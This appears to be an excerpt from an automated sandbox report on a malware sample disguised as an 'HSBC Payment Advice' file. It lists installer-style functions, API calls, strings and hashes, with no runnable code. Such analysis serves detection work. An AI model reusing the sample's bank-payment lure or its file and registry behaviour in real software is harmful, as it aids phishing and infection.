          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
          • String ID:
          • API String ID: 2320649405-0
          • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
          • Instruction ID: 87ec7ba1b4d1524bc80d11c5e2deb64ad1684491122c805edd444a6dd702efce
          • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
          • Instruction Fuzzy Hash: 8521C6B1904744ABC7219F68DD08B4B7BF8AF40714F048A6DF996E22E0C738E944CB25
          Function 00402571 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142fileCOMMON
          Download Yara Rule
          APIs
          • ReadFile.KERNEL32(?,?,?,?), ref: 004025D9
          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402614
          • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402637
          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264D
            • Part of subcall function 00405BD7: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330A,00409230,00409230,004031FC,00413E78,00004000,?,00000000,?), ref: 00405BEB
            • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
          • String ID: 9
          • API String ID: 1149667376-2366072709
          • Opcode ID: 0aa63fe2a692f6bc31d5825d39ecadd6a947c78fcb5bd60f73af14f5e7ff11a7
          • Instruction ID: b7948383e8f2d929eee7054b26862d8c15f429c1db02a3f5617992bcc001f061
          • Opcode Fuzzy Hash: 0aa63fe2a692f6bc31d5825d39ecadd6a947c78fcb5bd60f73af14f5e7ff11a7
          • Instruction Fuzzy Hash: CE51ECB1D00219AADF24DFA4DE88AAEB779FF04304F50443BE501B62D0DB759E41CB69
          Function 004027B3 Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
          Download Yara Rule
          APIs
          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402807
          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402823
          • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285C
          • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040286E
          • GlobalFree.KERNEL32(00000000), ref: 00402875
          • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288D
          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A1
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
          • String ID:
          • API String ID: 3294113728-0
          • Opcode ID: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
          • Instruction ID: d8d6ca7fed8381a62db75c1a7eb0a932fa2c1c5e4fe23f3949340a0d5ba681c8
          • Opcode Fuzzy Hash: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
          • Instruction Fuzzy Hash: 4031A072C04118BBDF10AFA5CE49DAF7E79EF09364F24023AF510762E0C6795E418BA9
          Function 004024EC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54filestringCOMMON
          Download Yara Rule
          APIs
          • WideCharToMultiByte.KERNEL32(?,?,0040A580,000000FF,truckled\Spaanskraberne198,00000400,?,?,00000021), ref: 0040252D
          • lstrlenA.KERNEL32(truckled\Spaanskraberne198,?,?,0040A580,000000FF,truckled\Spaanskraberne198,00000400,?,?,00000021), ref: 00402534
          • WriteFile.KERNEL32(00000000,?,truckled\Spaanskraberne198,00000000,?,?,00000000,00000011), ref: 00402566
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: ByteCharFileMultiWideWritelstrlen
          • String ID: 8$truckled\Spaanskraberne198
          • API String ID: 1453599865-3066209257
          • Opcode ID: e65311729cd25a9fde1851530528e05ef132e905d6e37bdd957c59a724d10906
          • Instruction ID: 3c80ca3e5ebaf71c7783d8616bec5f928a83f38c30d871a0748769bbcf272298
          • Opcode Fuzzy Hash: e65311729cd25a9fde1851530528e05ef132e905d6e37bdd957c59a724d10906
          • Instruction Fuzzy Hash: 8B019271A44204BED700AFA0DE89EAF7278EB50319F20053BF502B61D2D7BC5E41DA2E
          Function 00402D18 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
          Download Yara Rule
          APIs
          • DestroyWindow.USER32(00000000,00000000), ref: 00402D33
          • GetTickCount.KERNEL32 ref: 00402D51
          • wsprintfW.USER32 ref: 00402D7F
            • Part of subcall function 00405192: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
            • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
            • Part of subcall function 00405192: lstrcatW.KERNEL32(Completed,00402D92,00402D92,Completed,00000000,00000000,00000000), ref: 004051ED
            • Part of subcall function 00405192: SetWindowTextW.USER32(Completed,Completed), ref: 004051FF
            • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
            • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
            • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
          • CreateDialogParamW.USER32(0000006F,00000000,00402C7D,00000000), ref: 00402DA3
          • ShowWindow.USER32(00000000,00000005), ref: 00402DB1
            • Part of subcall function 00402CFC: MulDiv.KERNEL32(00058F7C,00000064,0005F115), ref: 00402D11
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
          • String ID: ... %d%%
          • API String ID: 722711167-2449383134
          • Opcode ID: 05583ad892283c0780e81c4539ecbfd5aa97a15968b20a28e9ee239037342e8f
          • Instruction ID: 06dbfd79dbb9e8c2a0b606a1608badac8d0e42e3594422c28149bacc2d6aa5cf
          • Opcode Fuzzy Hash: 05583ad892283c0780e81c4539ecbfd5aa97a15968b20a28e9ee239037342e8f
          • Instruction Fuzzy Hash: AD016131945225EBD762AB60AE4DAEB7B68EF01700F14407BF845B11E1C7FC9D41CA9E
          Function 00404A5C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
          Download Yara Rule
          APIs
          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A77
          • GetMessagePos.USER32 ref: 00404A7F
          • ScreenToClient.USER32(?,?), ref: 00404A99
          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAB
          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD1
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: Message$Send$ClientScreen
          • String ID: f
          • API String ID: 41195575-1993550816
          • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
          • Instruction ID: 7a49535742b5819285e47484f8d523d0bdd0b2e8bbf2cce5393fd09457f71794
          • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
          • Instruction Fuzzy Hash: 0C014C71E40219BADB00DBA4DD85BFEBBBCAB54711F10412ABB11B61C0D6B4AA018BA5
          Function 00402C7D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
          Download Yara Rule
          APIs
          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9B
          • wsprintfW.USER32 ref: 00402CCF
          • SetWindowTextW.USER32(?,?), ref: 00402CDF
          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF1
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: Text$ItemTimerWindowwsprintf
          • String ID: unpacking data: %d%%$verifying installer: %d%%
          • API String ID: 1451636040-1158693248
          • Opcode ID: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
          • Instruction ID: 136f1b4430288e91b1c5e5d445282cac07027c6a7f734139abdfd1d0af9ea11d
          • Opcode Fuzzy Hash: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
          • Instruction Fuzzy Hash: C6F0127050410DABEF209F51DD49BAE3768BB00309F00843AFA16A51D0DBB95959DF59
          Function 00402B78 Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
          Download Yara Rule
          APIs
          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B99
          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD5
          • RegCloseKey.ADVAPI32(?), ref: 00402BDE
          • RegCloseKey.ADVAPI32(?), ref: 00402C03
          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C21
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: Close$DeleteEnumOpen
          • String ID:
          • API String ID: 1912718029-0
          • Opcode ID: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
          • Instruction ID: 9ec10266fc8442ca9feb2f2c36393197ef7fd7660a084b6a818e704b420db749
          • Opcode Fuzzy Hash: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
          • Instruction Fuzzy Hash: 0D113A7190410CFEEF11AF90DE89EAE3B79EB44348F10057AFA05A10E0D3B59E51AA69
          Function 00401CE5 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
          Download Yara Rule
          APIs
          • GetDlgItem.USER32(?,?), ref: 00401CEB
          • GetClientRect.USER32(00000000,?), ref: 00401CF8
          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
          • DeleteObject.GDI32(00000000), ref: 00401D36
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
          • String ID:
          • API String ID: 1849352358-0
          • Opcode ID: 61ac965e6a97560830dd210d4b93085389fca879a077f1281721c05f34562f3a
          • Instruction ID: d276e06630420d280db9d3d8713a95f95ab602fc4af0e03377fdcd968a8fda9f
          • Opcode Fuzzy Hash: 61ac965e6a97560830dd210d4b93085389fca879a077f1281721c05f34562f3a
          • Instruction Fuzzy Hash: B9F0ECB2A04104AFD701DFE4EE88CEEB7BCEB08301B100466F601F61A0D674AD018B39
          Function 00401D41 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
          Download Yara Rule
          APIs
          • GetDC.USER32(?), ref: 00401D44
          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
          • ReleaseDC.USER32(?,00000000), ref: 00401D71
          • CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: CapsCreateDeviceFontIndirectRelease
          • String ID:
          • API String ID: 3808545654-0
          • Opcode ID: de03f2b16b471deeb75989a648f0339490e64a22e039540fc3332c447546e770
          • Instruction ID: 44c615356a1505882b51123a4f434c8e94683597a24d5f064f7d9f3cb87cb74c
          • Opcode Fuzzy Hash: de03f2b16b471deeb75989a648f0339490e64a22e039540fc3332c447546e770
          • Instruction Fuzzy Hash: 25012630948280AFE7006BB0AE4BB9A7F74EF95305F104479F145B62E2C37810009B6E
          Function 00404976 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
          Download Yara Rule
          APIs
          • lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A07
          • wsprintfW.USER32 ref: 00404A10
          • SetDlgItemTextW.USER32(?,004226D0), ref: 00404A23
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: ItemTextlstrlenwsprintf
          • String ID: %u.%u%s%s
          • API String ID: 3540041739-3551169577
          • Opcode ID: 5ac319f3f1fbe76218499090b5c3f3a2c47b89264d6babd6022050aef882dcc8
          • Instruction ID: 11a56ec29d8e774b63c5a31ca8dd146b3e369a93441477fc7d09fda37b012288
          • Opcode Fuzzy Hash: 5ac319f3f1fbe76218499090b5c3f3a2c47b89264d6babd6022050aef882dcc8
          • Instruction Fuzzy Hash: 7011E273A002243BCB10A66D9C45EAF368D9BC6374F14423BFA69F61D1D9799C2186EC
          Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
          Download Yara Rule
          APIs
          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.86835804304.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.86835759710.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835835189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86835862567.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.86836136121.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_HSBC Payment Advice.jbxd
          Similarity
          • API ID: MessageSend$Timeout
          • String ID: !
          • API String ID: 1777923405-2657877971
          • Opcode ID: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
          • Instruction ID: 4e2ee5f0d92934ddef816e72561913b102c535ce611946f90f9b6b3ff638ae8b
          • Opcode Fuzzy Hash: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
